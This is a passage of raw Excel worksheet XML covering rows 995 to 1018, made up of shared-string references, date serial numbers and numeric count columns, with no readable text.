      <c r="B995" s="52">
        <v>43782.656118692132</v>
      </c>
      <c r="C995" s="95" t="s">
        <v>3132</v>
      </c>
      <c r="D995" s="96">
        <v>111</v>
      </c>
      <c r="E995" s="95" t="s">
        <v>3133</v>
      </c>
      <c r="F995" s="42">
        <v>100</v>
      </c>
      <c r="G995" s="95" t="s">
        <v>3134</v>
      </c>
      <c r="H995" t="s">
        <v>3135</v>
      </c>
      <c r="I995" t="s">
        <v>833</v>
      </c>
      <c r="J995" s="95" t="s">
        <v>25</v>
      </c>
      <c r="K995" s="95" t="s">
        <v>25</v>
      </c>
      <c r="L995" t="s">
        <v>77</v>
      </c>
      <c r="M995" s="95" t="s">
        <v>834</v>
      </c>
      <c r="N995" t="s">
        <v>835</v>
      </c>
      <c r="Q995" s="95" t="s">
        <v>3136</v>
      </c>
      <c r="R995">
        <v>2815</v>
      </c>
      <c r="S995">
        <v>1721</v>
      </c>
      <c r="T995">
        <v>10795</v>
      </c>
      <c r="U995">
        <v>21586</v>
      </c>
      <c r="V995">
        <v>23472</v>
      </c>
      <c r="W995" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="996" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A996" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B996" s="52">
        <v>43850.488308136577</v>
      </c>
      <c r="C996" s="95" t="s">
        <v>3137</v>
      </c>
      <c r="D996" s="96">
        <v>100</v>
      </c>
      <c r="E996" s="95" t="s">
        <v>3138</v>
      </c>
      <c r="F996" s="42">
        <v>100</v>
      </c>
      <c r="G996" s="95" t="s">
        <v>3139</v>
      </c>
      <c r="H996" t="s">
        <v>3140</v>
      </c>
      <c r="I996" t="s">
        <v>611</v>
      </c>
      <c r="J996" s="95" t="s">
        <v>3130</v>
      </c>
      <c r="K996" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L996" t="s">
        <v>77</v>
      </c>
      <c r="M996" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N996" t="s">
        <v>613</v>
      </c>
      <c r="O996" s="95" t="s">
        <v>1395</v>
      </c>
      <c r="Q996" s="95" t="s">
        <v>3141</v>
      </c>
      <c r="R996">
        <v>19758</v>
      </c>
      <c r="S996">
        <v>19097</v>
      </c>
      <c r="T996">
        <v>167120</v>
      </c>
      <c r="U996">
        <v>287284</v>
      </c>
      <c r="V996">
        <v>359576</v>
      </c>
      <c r="W996" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="997" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A997" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B997" s="52">
        <v>43787.387686296293</v>
      </c>
      <c r="C997" s="95" t="s">
        <v>3142</v>
      </c>
      <c r="D997" s="96">
        <v>110</v>
      </c>
      <c r="E997" s="95" t="s">
        <v>3143</v>
      </c>
      <c r="F997" s="42">
        <v>110</v>
      </c>
      <c r="G997" s="95" t="s">
        <v>3144</v>
      </c>
      <c r="H997" t="s">
        <v>3145</v>
      </c>
      <c r="I997" t="s">
        <v>75</v>
      </c>
      <c r="J997" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K997" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L997" t="s">
        <v>83</v>
      </c>
      <c r="M997" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N997" t="s">
        <v>221</v>
      </c>
      <c r="O997" s="95" t="s">
        <v>105</v>
      </c>
      <c r="P997" t="s">
        <v>222</v>
      </c>
      <c r="Q997" s="95" t="s">
        <v>3146</v>
      </c>
      <c r="W997" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="998" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A998" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B998" s="52">
        <v>43797.702984733798</v>
      </c>
      <c r="C998" s="95" t="s">
        <v>3147</v>
      </c>
      <c r="D998" s="96">
        <v>107</v>
      </c>
      <c r="E998" s="95" t="s">
        <v>3148</v>
      </c>
      <c r="F998" s="42">
        <v>101</v>
      </c>
      <c r="G998" s="95" t="s">
        <v>3149</v>
      </c>
      <c r="H998" t="s">
        <v>3150</v>
      </c>
      <c r="I998" t="s">
        <v>75</v>
      </c>
      <c r="J998" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K998" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L998" t="s">
        <v>83</v>
      </c>
      <c r="M998" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N998" t="s">
        <v>221</v>
      </c>
      <c r="O998" s="95" t="s">
        <v>1561</v>
      </c>
      <c r="P998" t="s">
        <v>222</v>
      </c>
      <c r="Q998" s="95" t="s">
        <v>3151</v>
      </c>
      <c r="W998" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="999" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A999" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B999" s="52">
        <v>44019.161265856485</v>
      </c>
      <c r="C999" s="95" t="s">
        <v>3147</v>
      </c>
      <c r="D999" s="96">
        <v>107</v>
      </c>
      <c r="E999" s="95" t="s">
        <v>3152</v>
      </c>
      <c r="F999" s="42">
        <v>106</v>
      </c>
      <c r="G999" s="95" t="s">
        <v>3153</v>
      </c>
      <c r="H999" t="s">
        <v>3154</v>
      </c>
      <c r="I999" t="s">
        <v>156</v>
      </c>
      <c r="J999" s="95" t="s">
        <v>438</v>
      </c>
      <c r="K999" s="95" t="s">
        <v>38</v>
      </c>
      <c r="L999" t="s">
        <v>38</v>
      </c>
      <c r="M999" s="95" t="s">
        <v>38</v>
      </c>
      <c r="N999" t="s">
        <v>38</v>
      </c>
      <c r="O999" s="95" t="s">
        <v>3155</v>
      </c>
      <c r="P999" t="s">
        <v>512</v>
      </c>
      <c r="Q999" s="95" t="s">
        <v>3151</v>
      </c>
      <c r="T999">
        <v>1749</v>
      </c>
      <c r="U999">
        <v>2548</v>
      </c>
      <c r="V999">
        <v>5572</v>
      </c>
      <c r="W999" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1000" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1000" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1000" s="52">
        <v>44076.007642997683</v>
      </c>
      <c r="C1000" s="95" t="s">
        <v>3156</v>
      </c>
      <c r="D1000" s="96">
        <v>101</v>
      </c>
      <c r="E1000" s="95" t="s">
        <v>3157</v>
      </c>
      <c r="F1000" s="42">
        <v>101</v>
      </c>
      <c r="G1000" s="95" t="s">
        <v>3158</v>
      </c>
      <c r="H1000" t="s">
        <v>3159</v>
      </c>
      <c r="I1000" t="s">
        <v>185</v>
      </c>
      <c r="J1000" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K1000" s="95" t="s">
        <v>16</v>
      </c>
      <c r="L1000" t="s">
        <v>83</v>
      </c>
      <c r="M1000" s="95" t="s">
        <v>72</v>
      </c>
      <c r="P1000" t="s">
        <v>1691</v>
      </c>
      <c r="Q1000" s="95" t="s">
        <v>3160</v>
      </c>
      <c r="R1000">
        <v>496</v>
      </c>
      <c r="S1000">
        <v>1138</v>
      </c>
      <c r="T1000">
        <v>2844</v>
      </c>
      <c r="U1000">
        <v>5708</v>
      </c>
      <c r="V1000">
        <v>8033</v>
      </c>
      <c r="W1000" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1001" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1001" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1001" s="52">
        <v>43782.656118761573</v>
      </c>
      <c r="C1001" s="95" t="s">
        <v>3132</v>
      </c>
      <c r="D1001" s="96">
        <v>111</v>
      </c>
      <c r="E1001" s="95" t="s">
        <v>3161</v>
      </c>
      <c r="F1001" s="42">
        <v>100</v>
      </c>
      <c r="G1001" s="95" t="s">
        <v>3162</v>
      </c>
      <c r="H1001" t="s">
        <v>3163</v>
      </c>
      <c r="I1001" t="s">
        <v>833</v>
      </c>
      <c r="J1001" s="95" t="s">
        <v>25</v>
      </c>
      <c r="K1001" s="95" t="s">
        <v>25</v>
      </c>
      <c r="L1001" t="s">
        <v>77</v>
      </c>
      <c r="M1001" s="95" t="s">
        <v>834</v>
      </c>
      <c r="N1001" t="s">
        <v>835</v>
      </c>
      <c r="Q1001" s="95" t="s">
        <v>3136</v>
      </c>
      <c r="R1001">
        <v>3159</v>
      </c>
      <c r="S1001">
        <v>1921</v>
      </c>
      <c r="T1001">
        <v>11829</v>
      </c>
      <c r="U1001">
        <v>24497</v>
      </c>
      <c r="V1001">
        <v>26708</v>
      </c>
      <c r="W1001" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1002" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1002" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1002" s="52">
        <v>43782.656118726853</v>
      </c>
      <c r="C1002" s="95" t="s">
        <v>3132</v>
      </c>
      <c r="D1002" s="96">
        <v>111</v>
      </c>
      <c r="E1002" s="95" t="s">
        <v>3164</v>
      </c>
      <c r="F1002" s="42">
        <v>100</v>
      </c>
      <c r="G1002" s="95" t="s">
        <v>3165</v>
      </c>
      <c r="H1002" t="s">
        <v>3166</v>
      </c>
      <c r="I1002" t="s">
        <v>833</v>
      </c>
      <c r="J1002" s="95" t="s">
        <v>25</v>
      </c>
      <c r="K1002" s="95" t="s">
        <v>25</v>
      </c>
      <c r="L1002" t="s">
        <v>77</v>
      </c>
      <c r="M1002" s="95" t="s">
        <v>834</v>
      </c>
      <c r="N1002" t="s">
        <v>835</v>
      </c>
      <c r="Q1002" s="95" t="s">
        <v>3136</v>
      </c>
      <c r="R1002">
        <v>94</v>
      </c>
      <c r="S1002">
        <v>67</v>
      </c>
      <c r="T1002">
        <v>492</v>
      </c>
      <c r="U1002">
        <v>1098</v>
      </c>
      <c r="V1002">
        <v>1047</v>
      </c>
      <c r="W1002" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1003" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1003" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1003" s="52">
        <v>43782.497609467595</v>
      </c>
      <c r="C1003" s="95" t="s">
        <v>1769</v>
      </c>
      <c r="D1003" s="96">
        <v>102</v>
      </c>
      <c r="E1003" s="95" t="s">
        <v>3167</v>
      </c>
      <c r="F1003" s="42">
        <v>101</v>
      </c>
      <c r="G1003" s="95" t="s">
        <v>3168</v>
      </c>
      <c r="H1003" t="s">
        <v>3169</v>
      </c>
      <c r="I1003" t="s">
        <v>82</v>
      </c>
      <c r="J1003" s="95" t="s">
        <v>744</v>
      </c>
      <c r="K1003" s="95" t="s">
        <v>24</v>
      </c>
      <c r="L1003" t="s">
        <v>83</v>
      </c>
      <c r="M1003" s="95" t="s">
        <v>72</v>
      </c>
      <c r="O1003" s="95" t="s">
        <v>1778</v>
      </c>
      <c r="P1003" t="s">
        <v>745</v>
      </c>
      <c r="Q1003" s="95" t="s">
        <v>1779</v>
      </c>
      <c r="R1003">
        <v>4454</v>
      </c>
      <c r="S1003">
        <v>2696</v>
      </c>
      <c r="T1003">
        <v>18322</v>
      </c>
      <c r="U1003">
        <v>35797</v>
      </c>
      <c r="V1003">
        <v>49180</v>
      </c>
      <c r="W1003" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1004" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1004" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1004" s="52">
        <v>43782.497609502316</v>
      </c>
      <c r="C1004" s="95" t="s">
        <v>1769</v>
      </c>
      <c r="D1004" s="96">
        <v>102</v>
      </c>
      <c r="E1004" s="95" t="s">
        <v>3170</v>
      </c>
      <c r="F1004" s="42">
        <v>101</v>
      </c>
      <c r="G1004" s="95" t="s">
        <v>3171</v>
      </c>
      <c r="H1004" t="s">
        <v>1786</v>
      </c>
      <c r="I1004" t="s">
        <v>82</v>
      </c>
      <c r="J1004" s="95" t="s">
        <v>744</v>
      </c>
      <c r="K1004" s="95" t="s">
        <v>24</v>
      </c>
      <c r="L1004" t="s">
        <v>83</v>
      </c>
      <c r="M1004" s="95" t="s">
        <v>72</v>
      </c>
      <c r="O1004" s="95" t="s">
        <v>1778</v>
      </c>
      <c r="P1004" t="s">
        <v>745</v>
      </c>
      <c r="Q1004" s="95" t="s">
        <v>1779</v>
      </c>
      <c r="R1004">
        <v>87</v>
      </c>
      <c r="S1004">
        <v>38</v>
      </c>
      <c r="T1004">
        <v>299</v>
      </c>
      <c r="U1004">
        <v>568</v>
      </c>
      <c r="V1004">
        <v>851</v>
      </c>
      <c r="W1004" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1005" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1005" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1005" s="52">
        <v>44162.734298738425</v>
      </c>
      <c r="C1005" s="95" t="s">
        <v>3132</v>
      </c>
      <c r="D1005" s="96">
        <v>111</v>
      </c>
      <c r="E1005" s="95" t="s">
        <v>3172</v>
      </c>
      <c r="F1005" s="42">
        <v>101</v>
      </c>
      <c r="G1005" s="95" t="s">
        <v>3173</v>
      </c>
      <c r="H1005" t="s">
        <v>3174</v>
      </c>
      <c r="I1005" t="s">
        <v>833</v>
      </c>
      <c r="J1005" s="95" t="s">
        <v>25</v>
      </c>
      <c r="K1005" s="95" t="s">
        <v>25</v>
      </c>
      <c r="L1005" t="s">
        <v>77</v>
      </c>
      <c r="M1005" s="95" t="s">
        <v>834</v>
      </c>
      <c r="N1005" t="s">
        <v>835</v>
      </c>
      <c r="Q1005" s="95" t="s">
        <v>3136</v>
      </c>
      <c r="R1005">
        <v>125</v>
      </c>
      <c r="S1005">
        <v>69</v>
      </c>
      <c r="T1005">
        <v>444</v>
      </c>
      <c r="U1005">
        <v>1179</v>
      </c>
      <c r="V1005">
        <v>1473</v>
      </c>
      <c r="W1005" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1006" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1006" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1006" s="52">
        <v>43999.762850706022</v>
      </c>
      <c r="C1006" s="95" t="s">
        <v>3175</v>
      </c>
      <c r="D1006" s="96">
        <v>151</v>
      </c>
      <c r="E1006" s="95" t="s">
        <v>3176</v>
      </c>
      <c r="F1006" s="42">
        <v>114</v>
      </c>
      <c r="G1006" s="95" t="s">
        <v>3177</v>
      </c>
      <c r="H1006" t="s">
        <v>2363</v>
      </c>
      <c r="I1006" t="s">
        <v>179</v>
      </c>
      <c r="J1006" s="95" t="s">
        <v>180</v>
      </c>
      <c r="K1006" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L1006" t="s">
        <v>77</v>
      </c>
      <c r="O1006" s="95" t="s">
        <v>2364</v>
      </c>
      <c r="P1006" t="s">
        <v>920</v>
      </c>
      <c r="Q1006" s="95" t="s">
        <v>3178</v>
      </c>
      <c r="R1006">
        <v>32187</v>
      </c>
      <c r="S1006">
        <v>26144</v>
      </c>
      <c r="T1006">
        <v>43628</v>
      </c>
      <c r="U1006">
        <v>290979</v>
      </c>
      <c r="V1006">
        <v>439408</v>
      </c>
      <c r="W1006" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1007" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1007" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1007" s="52">
        <v>43907.49058435185</v>
      </c>
      <c r="C1007" s="95" t="s">
        <v>3175</v>
      </c>
      <c r="D1007" s="96">
        <v>151</v>
      </c>
      <c r="E1007" s="95" t="s">
        <v>3179</v>
      </c>
      <c r="F1007" s="42">
        <v>100</v>
      </c>
      <c r="G1007" s="95" t="s">
        <v>3180</v>
      </c>
      <c r="H1007" t="s">
        <v>1071</v>
      </c>
      <c r="I1007" t="s">
        <v>179</v>
      </c>
      <c r="J1007" s="95" t="s">
        <v>180</v>
      </c>
      <c r="K1007" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L1007" t="s">
        <v>77</v>
      </c>
      <c r="O1007" s="95" t="s">
        <v>3181</v>
      </c>
      <c r="Q1007" s="95" t="s">
        <v>3178</v>
      </c>
      <c r="W1007" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1008" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1008" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1008" s="52">
        <v>43986.726563715281</v>
      </c>
      <c r="C1008" s="95" t="s">
        <v>3175</v>
      </c>
      <c r="D1008" s="96">
        <v>151</v>
      </c>
      <c r="E1008" s="95" t="s">
        <v>3182</v>
      </c>
      <c r="F1008" s="42">
        <v>103</v>
      </c>
      <c r="G1008" s="95" t="s">
        <v>3183</v>
      </c>
      <c r="H1008" t="s">
        <v>3184</v>
      </c>
      <c r="I1008" t="s">
        <v>179</v>
      </c>
      <c r="J1008" s="95" t="s">
        <v>180</v>
      </c>
      <c r="K1008" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L1008" t="s">
        <v>77</v>
      </c>
      <c r="O1008" s="95" t="s">
        <v>2370</v>
      </c>
      <c r="P1008" t="s">
        <v>181</v>
      </c>
      <c r="Q1008" s="95" t="s">
        <v>3178</v>
      </c>
      <c r="W1008" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1009" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1009" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1009" s="52">
        <v>43907.490584409723</v>
      </c>
      <c r="C1009" s="95" t="s">
        <v>3175</v>
      </c>
      <c r="D1009" s="96">
        <v>151</v>
      </c>
      <c r="E1009" s="95" t="s">
        <v>3185</v>
      </c>
      <c r="F1009" s="42">
        <v>103</v>
      </c>
      <c r="G1009" s="95" t="s">
        <v>3186</v>
      </c>
      <c r="H1009" t="s">
        <v>3187</v>
      </c>
      <c r="I1009" t="s">
        <v>179</v>
      </c>
      <c r="J1009" s="95" t="s">
        <v>180</v>
      </c>
      <c r="K1009" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L1009" t="s">
        <v>77</v>
      </c>
      <c r="O1009" s="95" t="s">
        <v>2370</v>
      </c>
      <c r="P1009" t="s">
        <v>181</v>
      </c>
      <c r="Q1009" s="95" t="s">
        <v>3178</v>
      </c>
      <c r="W1009" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1010" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1010" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1010" s="52">
        <v>43795.860850034725</v>
      </c>
      <c r="C1010" s="95" t="s">
        <v>3188</v>
      </c>
      <c r="D1010" s="96">
        <v>124</v>
      </c>
      <c r="E1010" s="95" t="s">
        <v>3189</v>
      </c>
      <c r="F1010" s="42">
        <v>102</v>
      </c>
      <c r="G1010" s="95" t="s">
        <v>3190</v>
      </c>
      <c r="H1010" t="s">
        <v>3191</v>
      </c>
      <c r="I1010" t="s">
        <v>156</v>
      </c>
      <c r="J1010" s="95" t="s">
        <v>301</v>
      </c>
      <c r="K1010" s="95" t="s">
        <v>26</v>
      </c>
      <c r="L1010" t="s">
        <v>77</v>
      </c>
      <c r="M1010" s="95" t="s">
        <v>475</v>
      </c>
      <c r="N1010" t="s">
        <v>476</v>
      </c>
      <c r="P1010" t="s">
        <v>1824</v>
      </c>
      <c r="Q1010" s="95" t="s">
        <v>3192</v>
      </c>
      <c r="R1010">
        <v>122</v>
      </c>
      <c r="W1010" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1011" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1011" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1011" s="52">
        <v>44040.762134421297</v>
      </c>
      <c r="C1011" s="95" t="s">
        <v>3188</v>
      </c>
      <c r="D1011" s="96">
        <v>124</v>
      </c>
      <c r="E1011" s="95" t="s">
        <v>3193</v>
      </c>
      <c r="F1011" s="42">
        <v>112</v>
      </c>
      <c r="G1011" s="95" t="s">
        <v>3194</v>
      </c>
      <c r="H1011" t="s">
        <v>3195</v>
      </c>
      <c r="I1011" t="s">
        <v>156</v>
      </c>
      <c r="J1011" s="95" t="s">
        <v>301</v>
      </c>
      <c r="K1011" s="95" t="s">
        <v>26</v>
      </c>
      <c r="L1011" t="s">
        <v>77</v>
      </c>
      <c r="M1011" s="95" t="s">
        <v>475</v>
      </c>
      <c r="N1011" t="s">
        <v>476</v>
      </c>
      <c r="Q1011" s="95" t="s">
        <v>3192</v>
      </c>
      <c r="R1011">
        <v>17</v>
      </c>
      <c r="S1011">
        <v>4</v>
      </c>
      <c r="T1011">
        <v>1788</v>
      </c>
      <c r="U1011">
        <v>2602</v>
      </c>
      <c r="V1011">
        <v>102</v>
      </c>
      <c r="W1011" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1012" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1012" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1012" s="52">
        <v>44119.849477974538</v>
      </c>
      <c r="C1012" s="95" t="s">
        <v>3188</v>
      </c>
      <c r="D1012" s="96">
        <v>124</v>
      </c>
      <c r="E1012" s="95" t="s">
        <v>3196</v>
      </c>
      <c r="F1012" s="42">
        <v>104</v>
      </c>
      <c r="G1012" s="95" t="s">
        <v>3197</v>
      </c>
      <c r="H1012" t="s">
        <v>3198</v>
      </c>
      <c r="I1012" t="s">
        <v>156</v>
      </c>
      <c r="J1012" s="95" t="s">
        <v>301</v>
      </c>
      <c r="K1012" s="95" t="s">
        <v>26</v>
      </c>
      <c r="L1012" t="s">
        <v>77</v>
      </c>
      <c r="M1012" s="95" t="s">
        <v>475</v>
      </c>
      <c r="N1012" t="s">
        <v>476</v>
      </c>
      <c r="Q1012" s="95" t="s">
        <v>3192</v>
      </c>
      <c r="R1012">
        <v>405117</v>
      </c>
      <c r="S1012">
        <v>326149</v>
      </c>
      <c r="T1012">
        <v>2243305</v>
      </c>
      <c r="U1012">
        <v>3636291</v>
      </c>
      <c r="V1012">
        <v>4072765</v>
      </c>
      <c r="W1012" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1013" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1013" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1013" s="52">
        <v>43764.136447372686</v>
      </c>
      <c r="C1013" s="95" t="s">
        <v>3199</v>
      </c>
      <c r="D1013" s="96">
        <v>206</v>
      </c>
      <c r="E1013" s="95" t="s">
        <v>3200</v>
      </c>
      <c r="F1013" s="42">
        <v>110</v>
      </c>
      <c r="G1013" s="95" t="s">
        <v>3201</v>
      </c>
      <c r="H1013" t="s">
        <v>2972</v>
      </c>
      <c r="I1013" t="s">
        <v>268</v>
      </c>
      <c r="J1013" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K1013" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L1013" t="s">
        <v>77</v>
      </c>
      <c r="M1013" s="95" t="s">
        <v>290</v>
      </c>
      <c r="N1013" t="s">
        <v>291</v>
      </c>
      <c r="O1013" s="95" t="s">
        <v>2973</v>
      </c>
      <c r="P1013" t="s">
        <v>250</v>
      </c>
      <c r="Q1013" s="95" t="s">
        <v>3202</v>
      </c>
      <c r="R1013">
        <v>4088</v>
      </c>
      <c r="S1013">
        <v>2553</v>
      </c>
      <c r="T1013">
        <v>10750</v>
      </c>
      <c r="U1013">
        <v>5247</v>
      </c>
      <c r="V1013">
        <v>4679</v>
      </c>
      <c r="W1013" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1014" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1014" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1014" s="52">
        <v>43764.136447372686</v>
      </c>
      <c r="C1014" s="95" t="s">
        <v>3199</v>
      </c>
      <c r="D1014" s="96">
        <v>173</v>
      </c>
      <c r="E1014" s="95" t="s">
        <v>3200</v>
      </c>
      <c r="F1014" s="42">
        <v>110</v>
      </c>
      <c r="G1014" s="95" t="s">
        <v>3201</v>
      </c>
      <c r="H1014" t="s">
        <v>2972</v>
      </c>
      <c r="I1014" t="s">
        <v>268</v>
      </c>
      <c r="J1014" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K1014" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L1014" t="s">
        <v>77</v>
      </c>
      <c r="M1014" s="95" t="s">
        <v>290</v>
      </c>
      <c r="N1014" t="s">
        <v>291</v>
      </c>
      <c r="O1014" s="95" t="s">
        <v>2973</v>
      </c>
      <c r="Q1014" s="95" t="s">
        <v>3203</v>
      </c>
      <c r="R1014">
        <v>4088</v>
      </c>
      <c r="S1014">
        <v>2553</v>
      </c>
      <c r="T1014">
        <v>10750</v>
      </c>
      <c r="U1014">
        <v>5247</v>
      </c>
      <c r="V1014">
        <v>4679</v>
      </c>
      <c r="W1014" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1015" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1015" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1015" s="52">
        <v>44019.157665162034</v>
      </c>
      <c r="C1015" s="95" t="s">
        <v>3204</v>
      </c>
      <c r="D1015" s="96">
        <v>102</v>
      </c>
      <c r="E1015" s="95" t="s">
        <v>3205</v>
      </c>
      <c r="F1015" s="42">
        <v>102</v>
      </c>
      <c r="G1015" s="95" t="s">
        <v>3206</v>
      </c>
      <c r="H1015" t="s">
        <v>3207</v>
      </c>
      <c r="I1015" t="s">
        <v>185</v>
      </c>
      <c r="J1015" s="95" t="s">
        <v>542</v>
      </c>
      <c r="K1015" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L1015" t="s">
        <v>77</v>
      </c>
      <c r="N1015" t="s">
        <v>3208</v>
      </c>
      <c r="O1015" s="95" t="s">
        <v>3209</v>
      </c>
      <c r="P1015" t="s">
        <v>1812</v>
      </c>
      <c r="Q1015" s="95" t="s">
        <v>3210</v>
      </c>
      <c r="R1015">
        <v>208181</v>
      </c>
      <c r="S1015">
        <v>143732</v>
      </c>
      <c r="T1015">
        <v>942430</v>
      </c>
      <c r="U1015">
        <v>1754325</v>
      </c>
      <c r="V1015">
        <v>1853012</v>
      </c>
      <c r="W1015" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1016" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1016" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1016" s="52">
        <v>44155.753830057867</v>
      </c>
      <c r="C1016" s="95" t="s">
        <v>3103</v>
      </c>
      <c r="D1016" s="96">
        <v>102</v>
      </c>
      <c r="E1016" s="95" t="s">
        <v>3211</v>
      </c>
      <c r="F1016" s="42">
        <v>102</v>
      </c>
      <c r="G1016" s="95" t="s">
        <v>3212</v>
      </c>
      <c r="H1016" t="s">
        <v>2723</v>
      </c>
      <c r="I1016" t="s">
        <v>75</v>
      </c>
      <c r="J1016" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K1016" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L1016" t="s">
        <v>77</v>
      </c>
      <c r="M1016" s="95" t="s">
        <v>2703</v>
      </c>
      <c r="Q1016" s="95" t="s">
        <v>3107</v>
      </c>
      <c r="R1016">
        <v>68114</v>
      </c>
      <c r="S1016">
        <v>53184</v>
      </c>
      <c r="T1016">
        <v>360742</v>
      </c>
      <c r="U1016">
        <v>579398</v>
      </c>
      <c r="V1016">
        <v>725758</v>
      </c>
      <c r="W1016" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1017" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1017" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1017" s="52">
        <v>44130.739603888891</v>
      </c>
      <c r="C1017" s="95" t="s">
        <v>3213</v>
      </c>
      <c r="D1017" s="96">
        <v>112</v>
      </c>
      <c r="E1017" s="95" t="s">
        <v>3214</v>
      </c>
      <c r="F1017" s="42">
        <v>102</v>
      </c>
      <c r="G1017" s="95" t="s">
        <v>3215</v>
      </c>
      <c r="H1017" t="s">
        <v>3216</v>
      </c>
      <c r="I1017" t="s">
        <v>156</v>
      </c>
      <c r="J1017" s="95" t="s">
        <v>301</v>
      </c>
      <c r="K1017" s="95" t="s">
        <v>26</v>
      </c>
      <c r="L1017" t="s">
        <v>77</v>
      </c>
      <c r="M1017" s="95" t="s">
        <v>475</v>
      </c>
      <c r="N1017" t="s">
        <v>476</v>
      </c>
      <c r="Q1017" s="95" t="s">
        <v>1325</v>
      </c>
      <c r="R1017">
        <v>1</v>
      </c>
      <c r="S1017">
        <v>1</v>
      </c>
      <c r="W1017" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1018" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1018" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1018" s="52">
        <v>44145.612867685188</v>
      </c>
      <c r="C1018" s="95" t="s">
        <v>3217</v>
      </c>
      <c r="D1018" s="96">
        <v>122</v>
      </c>
      <c r="E1018" s="95" t="s">
        <v>3218</v>
      </c>
      <c r="F1018" s="42">
        <v>102</v>
      </c>
      <c r="G1018" s="95" t="s">
        <v>3219</v>
      </c>
      <c r="H1018" t="s">
        <v>3220</v>
      </c>
      <c r="I1018" t="s">
        <v>156</v>
      </c>
      <c r="J1018" s="95" t="s">
        <v>301</v>
      </c>
      <c r="K1018" s="95" t="s">
        <v>26</v>
      </c>
      <c r="L1018" t="s">
        <v>77</v>
      </c>
      <c r="M1018" s="95" t="s">
        <v>475</v>
      </c>
      <c r="N1018" t="s">
        <v>476</v>
      </c>
      <c r="Q1018" s="95" t="s">
        <v>1325</v>
      </c>
      <c r="R1018">
        <v>116</v>
      </c>
      <c r="S1018">
        <v>128</v>
      </c>
      <c r="W1018" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1019" spans="1:23" x14ac:dyDescent="0.35">
